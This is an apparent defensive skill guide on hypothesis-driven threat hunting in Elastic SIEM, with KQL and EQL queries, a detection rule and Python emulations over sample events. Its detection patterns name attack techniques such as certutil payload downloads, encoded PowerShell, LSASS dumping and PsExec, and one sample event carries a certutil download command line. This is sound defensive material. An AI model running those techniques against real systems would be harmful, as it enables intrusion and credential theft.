Performing Threat Hunting with Elastic SIEM
When to Use
Use this skill when:
- SOC teams need to proactively search for threats not caught by existing detection rules
- Threat intelligence reports describe new TTPs requiring validation against historical data
- Red team exercises reveal detection gaps that need hunting query development
- Periodic hunting cadence requires structured hypothesis-driven investigations
Do not use for real-time alert triage — that belongs in the Elastic Security Alerts queue with automated detection rules.
Prerequisites
- Elastic Security 8.x+ with Security app enabled in Kibana
- Data ingestion via Elastic Agent (Endpoint Security integration) or Beats (Winlogbeat, Filebeat, Packetbeat)
- Data normalized to Elastic Common Schema (ECS) field mappings
- User role with `kibana_security_solution` and `read` access to relevant indices
- MITRE ATT&CK framework knowledge for hypothesis generation
Workflow
Step 1: Develop Hunting Hypothesis
Start with a hypothesis based on threat intelligence, ATT&CK technique, or anomaly:
Example Hypothesis: "Attackers are using living-off-the-land binaries (LOLBins) for execution, specifically certutil.exe for file downloads (T1105 — Ingress Tool Transfer)."
Define scope:
- Data sources: `logs-endpoint.events.process-*`, `logs-windows.sysmon_operational-*`
- Time range: Last 30 days
- Expected indicators: certutil.exe with `-urlcache`, `-split`, or `-decode` flags
Step 2: Hunt Using KQL in Discover
Open Kibana Discover and query with KQL (Kibana Query Language):
```kql
process.name: "certutil.exe" and process.args: ("-urlcache" or "-split" or "-decode" or "-encode" or "-verifyctl")
```
Refine to exclude known legitimate use:
```kql
process.name: "certutil.exe"
and process.args: ("-urlcache" or "-split" or "-decode")
and not process.parent.name: ("sccm*.exe" or "ccmexec.exe")
and not user.name: "SYSTEM"
```
For PowerShell-based hunting with encoded commands (T1059.001):
```kql
process.name: "powershell.exe"
and process.args: ("-enc" or "-encodedcommand" or "-e " or "frombase64string" or "iex" or "invoke-expression")
and not process.parent.executable: "C:\\Windows\\System32\\svchost.exe"
```
Step 3: Use EQL for Sequence Detection
Elastic Event Query Language (EQL) enables hunting for multi-step attack sequences:
Detect parent-child process anomalies (T1055 — Process Injection):
```eql
sequence by host.name with maxspan=5m
  [process where event.type == "start" and process.name == "explorer.exe"]
  [process where event.type == "start" and process.parent.name == "explorer.exe"
    and process.name in ("cmd.exe", "powershell.exe", "rundll32.exe", "regsvr32.exe")]
```
Detect credential dumping sequence (T1003):
```eql
sequence by host.name with maxspan=2m
  [process where event.type == "start"
    and process.name in ("procdump.exe", "procdump64.exe", "rundll32.exe", "taskmgr.exe")
    and process.args : "*lsass*"]
  [file where event.type == "creation"
    and file.extension in ("dmp", "dump", "bin")]
```
Detect lateral movement via PsExec (T1021.002):
```eql
sequence by source.ip with maxspan=1m
  [authentication where event.outcome == "success" and winlog.logon.type == "Network"]
  [process where event.type == "start"
    and process.name == "psexesvc.exe"]
```
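To make the sequence semantics concrete, the following added example (not Elastic's code and not part of the original page) re-implements the credential-dumping hunt above in Python over constructed ECS-style events: it shows how the `host.name` join key and the `maxspan=2m` window decide which process/file pairs are reported. Host names and timestamps are sample values.

```python
# Added example, not Elastic's code: emulate the Step 3 EQL credential-dumping
# sequence ('sequence by host.name with maxspan=2m') to show how the join key
# and the time window decide which event pairs match.
from datetime import datetime, timedelta
from fnmatch import fnmatch

DUMP_TOOLS = {"procdump.exe", "procdump64.exe", "rundll32.exe", "taskmgr.exe"}
DUMP_EXTENSIONS = {"dmp", "dump", "bin"}
MAXSPAN = timedelta(minutes=2)

def ev(ts, host, **fields):
    """Build a constructed ECS-style event (sample data, not real telemetry)."""
    return {"@timestamp": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), "host.name": host, **fields}

EVENTS = [
    ev("2024-03-01T10:00:00Z", "WORKSTATION-042", **{"event.category": "process", "event.type": "start",
       "process.name": "procdump.exe", "process.args": ["procdump.exe", "lsass.exe", "out.dmp"]}),
    ev("2024-03-01T10:00:40Z", "WORKSTATION-042", **{"event.category": "file", "event.type": "creation",
       "file.extension": "dmp"}),
    # Same tool on SERVER-DB-03, but the dump lands 10 minutes later: outside maxspan.
    ev("2024-03-01T11:00:00Z", "SERVER-DB-03", **{"event.category": "process", "event.type": "start",
       "process.name": "procdump64.exe", "process.args": ["procdump64.exe", "lsass.exe"]}),
    ev("2024-03-01T11:10:00Z", "SERVER-DB-03", **{"event.category": "file", "event.type": "creation",
       "file.extension": "dmp"}),
    # .bin created on a host with no stage-1 event: the join key never matches.
    ev("2024-03-01T11:00:30Z", "LAPTOP-EXEC-07", **{"event.category": "file", "event.type": "creation",
       "file.extension": "bin"}),
]

def is_lsass_access(e):
    """Stage 1: start of a dump-capable tool whose arguments reference lsass."""
    return (e.get("event.category") == "process" and e.get("event.type") == "start"
            and e.get("process.name") in DUMP_TOOLS
            and any(fnmatch(a.lower(), "*lsass*") for a in e.get("process.args", [])))

def is_dump_file(e):
    """Stage 2: creation of a file with a memory-dump extension."""
    return (e.get("event.category") == "file" and e.get("event.type") == "creation"
            and e.get("file.extension") in DUMP_EXTENSIONS)

def hunt_credential_dump(events, maxspan=MAXSPAN):
    """Return (host, stage1, stage2) triples where stage 2 follows stage 1 on the
    same host.name within maxspan, as the EQL sequence would report them."""
    pending, hits = {}, []   # pending: host.name -> newest unexpired stage-1 event
    for e in sorted(events, key=lambda x: x["@timestamp"]):
        host = e["host.name"]
        if is_lsass_access(e):
            pending[host] = e
        elif host in pending and is_dump_file(e):
            first = pending.pop(host)   # consumed whether it matched or expired
            if e["@timestamp"] - first["@timestamp"] <= maxspan:
                hits.append((host, first, e))
    return hits
```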
Step 4: Investigate with Elastic Security Timeline
Create a Timeline investigation in Elastic Security for collaborative analysis:
- Navigate to Security > Timelines > Create new timeline
- Add events from hunting queries using "Add to timeline" from Discover
- Pin critical events and add investigation notes
- Use the Timeline query bar for additional filtering:
```kql
host.name: "WORKSTATION-042" and event.category: ("process" or "network" or "file")
```
Add columns for key fields: `@timestamp`, `event.action`, `process.name`, `process.args`, `user.name`, `source.ip`, `destination.ip`
Step 5: Build Detection Rules from Findings
Convert successful hunting queries into Elastic detection rules:
```json
{
  "name": "Certutil Download Activity",
  "description": "Detects certutil.exe used for file download, a common LOLBin technique",
  "risk_score": 73,
  "severity": "high",
  "type": "eql",
  "query": "process where event.type == \"start\" and process.name == \"certutil.exe\" and process.args : (\"-urlcache\", \"-split\", \"-decode\") and not process.parent.name : (\"ccmexec.exe\", \"sccm*.exe\")",
  "threat": [
    {
      "framework": "MITRE ATT&CK",
      "tactic": {
        "id": "TA0011",
        "name": "Command and Control"
      },
      "technique": [
        {
          "id": "T1105",
          "name": "Ingress Tool Transfer"
        }
      ]
    }
  ],
  "tags": ["Hunting", "LOLBins", "T1105"],
  "interval": "5m",
  "from": "now-6m",
  "enabled": true
}
```
Deploy via Elastic Security API:
```bash
curl -X POST "https://kibana:5601/api/detection_engine/rules" \
  -H "kbn-xsrf: true" \
  -H "Content-Type: application/json" \
  -H "Authorization: ApiKey YOUR_API_KEY" \
  -d @certutil_rule.json
```
Step 6: Aggregate and Visualize Findings
Create hunting dashboard with aggregations:
```json
GET logs-endpoint.events.process-*/_search
{
  "size": 0,
  "query": {
    "bool": {
      "must": [
        {"term": {"process.name": "certutil.exe"}},
        {"range": {"@timestamp": {"gte": "now-30d"}}}
      ]
    }
  },
  "aggs": {
    "by_host": {
      "terms": {"field": "host.name", "size": 20},
      "aggs": {
        "by_user": {
          "terms": {"field": "user.name", "size": 10}
        },
        "by_args": {
          "terms": {"field": "process.args", "size": 10}
        }
      }
    }
  }
}
```
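The refined certutil filter from Step 2 and the by_host / by_user / by_args stacking above do the same job as the following added example (not Elastic's code, not part of the original page), which applies both to constructed process events so the exclusions and the counts can be checked without a cluster. Host names, users and URLs are sample values.

```python
# Added example, not Elastic's code: apply the refined certutil hunt filter from
# Step 2 and the by_host -> by_user / by_args stacking from Step 6 to constructed
# process events, so the exclusions and the counts can be checked offline.
from collections import Counter, defaultdict
from fnmatch import fnmatch

SUSPICIOUS_ARGS = {"-urlcache", "-split", "-decode"}
BENIGN_PARENTS = ("sccm*.exe", "ccmexec.exe")   # parents excluded in the KQL query

def ev(host, user, parent, *args):
    """Constructed ECS-style process event (sample data, not real telemetry)."""
    return {"host.name": host, "user.name": user, "process.name": "certutil.exe",
            "process.parent.name": parent, "process.args": ["certutil.exe", *args]}

EVENTS = [
    ev("WORKSTATION-042", "jdoe", "cmd.exe", "-urlcache", "-split", "-f", "http://203.0.113.10/payload.exe"),
    ev("SERVER-DB-03", "svc_db", "powershell.exe", "-decode", "enc.txt", "bin.exe"),
    ev("MGMT-01", "SYSTEM", "ccmexec.exe", "-urlcache", "-split", "-f", "http://sccm.corp.example/pkg"),  # SCCM noise
    ev("WORKSTATION-042", "jdoe", "cmd.exe", "-hashfile", "setup.msi", "SHA256"),  # benign use
]

def matches_hunt(e):
    """Python equivalent of the refined KQL: certutil with a suspicious flag,
    not launched by an SCCM parent and not running as SYSTEM."""
    if e.get("process.name", "").lower() != "certutil.exe":
        return False
    if not SUSPICIOUS_ARGS & {a.lower() for a in e.get("process.args", [])}:
        return False
    parent = e.get("process.parent.name", "").lower()
    if any(fnmatch(parent, p) for p in BENIGN_PARENTS):
        return False
    return e.get("user.name") != "SYSTEM"

def stack_by_host(events):
    """Mirror the terms aggregations: per host, count events, users and arguments
    (each argument counted once per event, as a terms bucket would)."""
    stacks = defaultdict(lambda: {"doc_count": 0, "by_user": Counter(), "by_args": Counter()})
    for e in events:
        s = stacks[e["host.name"]]
        s["doc_count"] += 1
        s["by_user"][e["user.name"]] += 1
        s["by_args"].update(set(e.get("process.args", [])))
    return dict(stacks)

def run_hunt(events):
    """Filter first, then stack the survivors: hosts with the rarest argument
    combinations are the ones to pivot into Timeline."""
    hits = [e for e in events if matches_hunt(e)]
    return hits, stack_by_host(hits)
```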
Step 7: Document Hunt and Close Loop
Record findings in a structured hunt report and update detection coverage:
- Hypothesis validated or refuted
- IOCs and affected hosts discovered
- Detection rules created or updated
- ATT&CK Navigator layer updated with new coverage
- Recommendations for security control improvements
Key Concepts
| Term | Definition |
|---|---|
| KQL | Kibana Query Language — simplified query syntax for filtering data in Kibana Discover and dashboards |
| EQL | Event Query Language — Elastic's sequence-aware query language for detecting multi-step attack patterns |
| ECS | Elastic Common Schema — standardized field naming convention enabling cross-source correlation |
| Timeline | Elastic Security investigation workspace for collaborative event analysis and annotation |
| Hypothesis-Driven Hunting | Structured approach starting with a theory about attacker behavior, tested against telemetry data |
| LOLBins | Living Off the Land Binaries — legitimate Windows tools (certutil, mshta, rundll32) abused by attackers |
Tools & Systems
- Elastic Security: SIEM platform built on Elasticsearch with detection rules, Timeline, and case management
- Elastic Agent: Unified data collection agent replacing Beats for endpoint and network telemetry
- Elastic Endpoint Security: EDR capabilities integrated into Elastic Agent for process, file, and network monitoring
- ATT&CK Navigator: MITRE tool for tracking detection and hunting coverage across the ATT&CK matrix
Common Scenarios
- LOLBin Abuse: Hunt for mshta.exe, regsvr32.exe, rundll32.exe, certutil.exe with suspicious arguments
- Persistence Mechanisms: Query for scheduled task creation, registry run key modification, WMI subscriptions
- C2 Beaconing: Analyze network flow data for periodic outbound connections with consistent intervals
- Data Staging: Hunt for large file compression (7z, rar, zip) followed by outbound transfers
- Account Manipulation: Search for net.exe user creation, group membership changes, or password resets by non-admin users
Output Format
```
THREAT HUNT REPORT — TH-2024-012
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Hypothesis: Attackers using certutil.exe for tool download (T1105)
Period: 2024-02-15 to 2024-03-15
Data Sources: Elastic Endpoint (process events), Sysmon

Findings:
  Total certutil executions: 342
  With -urlcache flag: 12 (3.5%)
  Suspicious (non-SCCM): 3 confirmed anomalous

Affected Hosts:
  WORKSTATION-042 (Finance) — certutil downloading payload.exe from external IP
  SERVER-DB-03 (Database) — certutil decoding base64 encoded binary
  LAPTOP-EXEC-07 (Executive) — certutil downloading script from Pastebin

Actions Taken:
  [DONE] 3 hosts isolated for forensic investigation
  [DONE] Detection rule "Certutil Download Activity" deployed (ID: elastic-th012)
  [DONE] ATT&CK Navigator updated: T1105 coverage = GREEN

Verdict: HYPOTHESIS CONFIRMED — 3 true positive findings escalated to IR
```